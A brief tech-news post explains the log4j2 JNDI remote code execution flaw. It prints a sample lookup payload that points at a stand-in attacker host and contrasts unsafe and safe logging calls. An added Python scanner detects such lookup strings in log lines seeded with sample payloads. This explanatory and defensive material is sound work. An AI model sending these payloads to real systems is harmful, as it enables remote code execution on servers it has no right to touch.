
RCE 0-day exploit found in log4j2 | Java Tech News
#security #bug #logging
Yesterday an exploit was found in the log4j2 library that results in Remote Code Execution (RCE) when a certain string is logged. Typically a logging library has one job: swallow the string as if it were a black box and spit it out elsewhere according to the provided configuration.

It turns out Log4j doesn't treat strings as black boxes. As with SQL injection, you can insert a variable into a string, "${jndi:ldap://attacker.com/a}", and the server makes a request to attacker.com via JNDI. The response contains a path to a remote Java class file (e.g. http://second-stage.attacker.com/Exploit.class), which is loaded into the server process. This injected payload triggers a second stage and allows an attacker to execute arbitrary code.

It only works, though, for improperly formatted log calls:
// this is ok
log.debug("user-agent={}", userAgent);

// this is bad
log.debug("user-agent=" + userAgent);
lunasec.io/docs/blog/log4j-zero-day/
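As an added example (not code from the original post or from lunasec), a small Python scanner that flags the "${jndi:...}" lookup strings described above when they appear in log lines, which is the kind of check a defender would run over access logs. The log lines, IP addresses and hostnames are constructed placeholders.

```python
import re
from dataclasses import dataclass

# Constructed sample access-log lines (placeholder traffic, not real captures).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET /api HTTP/1.1" 404 "${JNDI:rmi://203.0.113.10:1099/x}"',
    '10.0.0.3 - - "GET / HTTP/1.1" 200 "curl/7.79.1"',
]

# Matches a JNDI lookup: "${jndi:<scheme>://<host>..." with optional whitespace
# and any letter case, capturing the scheme and the host[:port] it points at.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)", re.IGNORECASE
)


@dataclass
class Finding:
    line_no: int   # 1-based index of the offending log line
    scheme: str    # lookup scheme, e.g. "ldap" or "rmi"
    host: str      # host[:port] the lookup would contact


def scan(lines):
    """Return a Finding for every line containing a JNDI lookup string."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        match = JNDI_LOOKUP.search(line)
        if match:
            findings.append(Finding(line_no, match.group(1).lower(), match.group(2)))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG_LINES):
        print(f"line {finding.line_no}: jndi {finding.scheme} lookup -> {finding.host}")
```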